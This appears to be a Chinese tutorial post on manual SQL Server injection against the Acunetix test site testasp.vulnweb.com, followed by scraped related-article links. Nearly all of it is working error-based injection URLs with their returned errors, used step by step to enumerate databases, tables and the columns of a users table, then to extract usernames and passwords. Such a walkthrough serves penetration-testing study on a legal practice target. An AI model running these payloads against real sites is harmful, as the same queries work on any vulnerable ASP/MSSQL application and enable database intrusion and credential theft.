sql server手工注入
sql server手工注入
测试网站testasp.vulnweb.com
1.
http://testasp.vulnweb.com/showforum.asp?id=0
http://testasp.vulnweb.com/showforum.asp?id=0'
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2
2.数据库版本
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)
3.数据库名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())
4.第一个数据库
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)
返回Conversion failed when converting the nvarchar value 'acublog' to data type int
5.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')
返回Conversion failed when converting the nvarchar value 'acuforum' to data type int
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')
返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')
返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
那就这几个数据库了
6.获取表名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')
返回Conversion failed when converting the nvarchar value 'threads' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')
返回Conversion failed when converting the nvarchar value 'users' to data type int
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')
返回Conversion failed when converting the nvarchar value 'forums' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')
返回Conversion failed when converting the nvarchar value 'posts' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')
返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
7.users的列名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))
返回Conversion failed when converting the nvarchar value 'uname' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')
返回Conversion failed when converting the nvarchar value 'upass' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')
返回Conversion failed when converting the nvarchar value 'email' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')
返回Conversion failed when converting the nvarchar value 'realname' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')
返回Conversion failed when converting the nvarchar value 'avatar' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')
返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
forums的列名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))
8.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)
返回Conversion failed when converting the nvarchar value '--' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)
返回Conversion failed when converting the nvarchar value 'none' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users where id =2)
返回
sql server手工注入的更多相关文章
- 手工注入——sql server (mssql)注入实战和分析
前言 首先要对sql server进行初步的了解.常用的全部变量@@version:返回当前的Sql server安装的版本.处理器体系结构.生成日期和操作系统.@@servername:放回运行Sq ...
- sql server 防 注入
这里使用的是参数化 SqlParameter useremail = new SqlParameter("@useremail", user.user_Email); SqlPar ...
- sql高级手工注入
非常重要:首先在网站找到管理入口,否则,呵呵就算有用户名和密码,找不到入口,也是白玩.. 注入时,注意通过改变大小写.编码.转换等方式躲过系统检查,顺利执行语句!!! (一)数字型注入 正常步骤: 1 ...
- SQL Server手工插入标识列
如果我们在标识列中插入值,例如: insert member(id,username) values(10,'admin') 则在查询分析器里面会返回错误信息: 引用内容 服务器: 消息 544,级别 ...
- Sql server注入一些tips
sql server环境测试: 几个特性: 1.sql server兼容性可以说是最差的. 举例: select x from y where id=1 字符串查询 select x from y w ...
- 使用OPENROWSET爆破SQL Server密码
使用OPENROWSET爆破SQL Server密码 OPENROWSET函数是SQL Server提供的一个连接函数.它可以用于使用OLE DB方式连接一个数据库,并进行数据查询等操作.使用该函 ...
- 实战记录之SQL server报错手工注入
前言 最近测试了一个站点,这个站点挺有意思,发现没有关闭错误提示,初步猜测是SQL server数据库,后来验证确实是.在这里记录一下实战过程,并详细讲解一下用到的知识点. SQL server报错注 ...
- (后端)sql手工注入语句&SQL手工注入大全(转)
转自脚本之家: 看看下面的1.判断是否有注入;and 1=1;and 1=2 2.初步判断是否是mssql;and user>0 3.判断数据库系统;and (select count(*) f ...
- sql工具和手工注入总结
普通注入: 数字注入 字符注入 base64注入:和常规的方法没有说明区别,主要是解码然后编码: 如果普通注入不行,尝试大小写绕过,编码等绕过: 如果不行尝试盲注: POST注入 0x00 常用的 注 ...
随机推荐
- webpages框架中使用Html.TextArea()在前台显示多行信息时,如何进行大小、样式的设置
环境:vs2015 webpages框架+razor语法: 目的:服务器进行数据更新操作后,在前台显示更新的相关信息: 后台代码:将更新条数等相关信息存储在一个变量中: @{ var serverIn ...
- bootstrap轮播图--兼容IE7
<!DOCTYPE html> <html> <head> <title>Bootstrap轮播</title> <meta char ...
- 024-ActionResult解说
ActionResult是一个抽象类,是Action运行后的回传类型,但是当Action回传ActionResult的时候,其实并不包含这个ActionResult的运行结果,而是包含运行这个Acti ...
- XPath的语法
XPath 是XML的查询语言,和SQL的角色很类似.以下面XML为例,介绍XPath 的语法. <?xml version="1.0" encoding="ISO ...
- Windows 8 IIS配置PHP运行环境
在Windows 8 的IIS(8.0)中搭建PHP运行环境: 一:安装IIS服务器 1.进入控制面板>>程序和功能>>打开或关闭Windows 功能,找到Internet信息 ...
- DSP bootloader学习笔记1
DSP bootloader学习笔记1 彭会锋 参考: TMS320F28xx DSP中内部Flash的应用研究 http://wenku.baidu.com/view/83e9837931b765c ...
- Rectangle Intersection Test (with C#)
Rectangle Intersection Test (with C#) by Sebastian Krysmanskihttp://manski.net/2011/05/rectangle-int ...
- 详细解读Jquery各Ajax函数
$.get(),$.post(),$.ajax(),$.getJSON() 一,$.get(url,[data],[callback]) 说明:url为请求地址,data为请求数据的列表,callba ...
- IOS开发设计思路
我在做 iOS 开发的时候,发现自己在写程序的时候,常常处于两种状态的切换,我把这两种状态称为软件开发的上帝模式与农民模式.我先给大家介绍一下这两种模式的特点. 上帝模式 处于上帝模式时,我需要构思整 ...
- MATLAB 生成数据保存至文件
% load pyrim % NumTrain = 50; % load machine %NumTrain = 150; % load housing % NumTrain = 300; % loa ...